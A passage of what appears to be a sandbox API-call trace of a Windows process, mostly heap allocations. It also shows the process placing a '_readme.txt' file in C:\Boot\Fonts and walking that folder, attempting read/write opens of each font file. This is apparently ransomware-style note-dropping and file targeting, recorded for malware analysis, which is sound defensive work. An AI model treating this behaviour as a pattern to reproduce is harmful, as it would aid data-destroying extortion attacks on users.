0x31ef7e8 [0093.054] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.054] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.054] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.054] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.054] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.054] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f05a0 [0093.054] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.054] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.054] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.054] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.054] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.054] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.054] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.054] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.054] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.054] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.054] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.054] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.054] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.054] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.055] PathFindFileNameW (pszPath="C:\\Boot\\Fonts\\") returned="Fonts\\" [0093.055] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.055] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0093.055] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0093.055] PathFindFileNameW (pszPath="") returned="" [0093.055] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.055] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0093.055] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0093.055] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x800) returned 0x31d1120 [0093.055] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0093.056] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x99c9c68 [0093.056] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.056] FreeLibrary (hLibModule=0x75670000) returned 1 [0093.056] PathAppendW (in: pszPath="C:\\Boot\\Fonts\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 1 [0093.056] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.056] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.056] PathFileExistsW (pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 1 [0093.056] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.056] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.056] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3300420, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3300420, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0093.056] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.056] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3300420, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3300420, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.056] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0093.056] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.056] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31758b8 [0093.056] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.056] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\chs_boot.ttf") returned=".ttf" [0093.056] CreateFileW (lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.057] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31758b8 | out: hHeap=0x680000) returned 1 [0093.057] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0093.057] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.057] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31758b8 [0093.057] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.057] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\cht_boot.ttf") returned=".ttf" [0093.057] CreateFileW (lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.058] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31758b8 | out: hHeap=0x680000) returned 1 [0093.058] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0093.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31758b8 [0093.058] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.058] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\jpn_boot.ttf") returned=".ttf" [0093.058] CreateFileW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.058] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31758b8 | out: hHeap=0x680000) returned 1 [0093.058] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0093.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31758b8 [0093.058] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.058] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\kor_boot.ttf") returned=".ttf" [0093.058] CreateFileW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.058] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31758b8 | out: hHeap=0x680000) returned 1 [0093.058] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0093.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31758b8 [0093.058] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.059] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned=".ttf" [0093.059] CreateFileW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31758b8 | out: hHeap=0x680000) returned 1 [0093.059] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa32da2c0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa32da2c0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3300420, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0093.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31758b8 [0093.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.059] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\_readme.txt") returned=".txt" [0093.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31758b8 | out: hHeap=0x680000) returned 1 [0093.059] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa32da2c0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa32da2c0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3300420, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0093.059] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0093.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef540 | out: hHeap=0x680000) returned 1 [0093.059] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0093.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef540 [0093.059] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0093.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.060] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.060] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.060] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.060] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.060] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.060] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.060] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.060] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.060] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.060] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f05a0 [0093.060] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.060] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.060] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.060] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.060] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.060] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.060] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f05a0 [0093.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, 